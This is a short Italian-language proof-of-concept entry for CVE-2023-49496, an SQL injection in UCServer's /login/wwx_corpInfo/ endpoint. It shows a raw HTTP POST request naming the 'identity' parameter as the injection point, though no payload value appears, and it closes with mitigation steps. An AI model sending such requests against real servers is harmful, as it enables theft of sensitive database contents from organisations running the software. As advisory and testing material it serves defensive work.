
Proof-of-concept exploit per CVE-2023-49496, che dimostra SQL injection in UCServer tramite l'endpoint /login/wwx_corpInfo/ per estrarre informazioni sensibili dal database.
UCServer è un avanzato server di comunicazione unificata. UCServer di Shanghai Shupin Information Technology Co., Ltd. presenta una vulnerabilità di SQL injection. Un utente malintenzionato può sfruttare questa vulnerabilità per ottenere informazioni sensibili dal database.
POST /login/wwx_corpInfo/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Referer: http://example.com/
Content-Length: 132
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Host: example.com
Proxy-Connection: Keep-alive
&identity=
Il parametro "identity" nel corpo della richiesta POST è il punto di iniezione.

Attivare il firewall del sito web; bloccare l'accesso a qualsiasi IP al percorso "/login/wwx_corpInfo/"; disabilitare le connessioni remote esterne al database; aggiornare la versione del database.